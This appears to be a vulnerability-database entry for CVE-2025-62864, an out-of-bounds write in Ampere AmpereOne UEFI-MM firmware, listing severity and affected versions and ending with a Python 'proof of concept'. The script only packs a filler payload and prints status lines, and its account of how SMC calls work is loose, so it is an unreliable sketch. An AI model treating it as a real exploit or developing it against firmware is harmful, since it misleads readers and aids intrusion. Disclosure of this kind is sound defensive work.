Security Vulnerability Report
CVE-2025-62864 CVSS 9.8 CRITICAL

CVE-2025-62864

Published: 2025-12-16 18:16:14
Last Modified: 2026-01-13 20:58:05

Description

Ampere AmpereOne AC03 devices before 3.5.9.3, AmpereOne AC04 devices before 4.4.5.2, and AmpereOne M devices before 5.4.5.1 allow an incorrectly formed SMC call to UEFI-MM MMCommunicate service that could result in an out-of-bounds write within the UEFI-MM Secure Partition context.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:amperecomputing:ampereone_a192-32m_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:amperecomputing:ampereone_a192-32m:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:amperecomputing:ampereone_a192-26m_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:amperecomputing:ampereone_a192-26m:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:amperecomputing:ampereone_a160-28m_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:amperecomputing:ampereone_a160-28m:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:amperecomputing:ampereone_a144-33m_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:amperecomputing:ampereone_a144-33m:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:amperecomputing:ampereone_a144-26m_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:amperecomputing:ampereone_a144-26m:-:*:*:*:*:*:*:* - NOT VULNERABLE
Ampere AmpereOne AC03 < 3.5.9.3
Ampere AmpereOne AC04 < 4.4.5.2
Ampere AmpereOne M < 5.4.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62864 PoC - Conceptual Proof of Concept
# Note: This is a conceptual demonstration for research purposes only
# Actual exploitation requires specific hardware access and firmware analysis

import struct


def construct_malicious_smc_call():
    """
    Construct a malformed SMC call to trigger OOB write in UEFI-MM
    This is a simplified conceptual representation
    """
    # SMC Function ID for MMCommunicate
    SMC_FUNC_ID = 0xC000EE01

    # Crafted buffer with oversized data
    # The MMCommunicate handler should validate buffer size
    # but vulnerable versions lack proper boundary checks
    oversized_buffer = b'A' * 1024  # Exceed expected buffer size

    # Construct SMC arguments
    smc_args = {
        'func_id': SMC_FUNC_ID,
        'buffer_address': 0xFFFFFFFF,  # Invalid/misleading address
        'buffer_size': len(oversized_buffer),
        'magic_value': 0xDEADBEEF  # May trigger specific code path
    }

    # Serialize for transmission
    payload = struct.pack(
        '<QQQQ',
        smc_args['func_id'],
        smc_args['buffer_address'],
        smc_args['buffer_size'],
        smc_args['magic_value']
    )
    payload += oversized_buffer
    return payload


def send_smc_call(payload):
    """
    Send malformed SMC call to trigger vulnerability
    Requires specific hardware interface (JTAG, debug port, or firmware update)
    """
    print(f"[*] Constructed malicious payload: {len(payload)} bytes")
    print(f"[*] SMC Function ID: 0xC000EE01")
    print(f"[*] Buffer size: 1024 bytes (exceeds safe limit)")
    print("[!] Note: Actual exploitation requires privileged access to device")
    # In real scenario, this would interface with ARM SMC dispatcher
    # or through firmware update mechanism


if __name__ == "__main__":
    poc = construct_malicious_smc_call()
    send_smc_call(poc)
    print("[*] PoC generated - requires hardware-level access for testing")
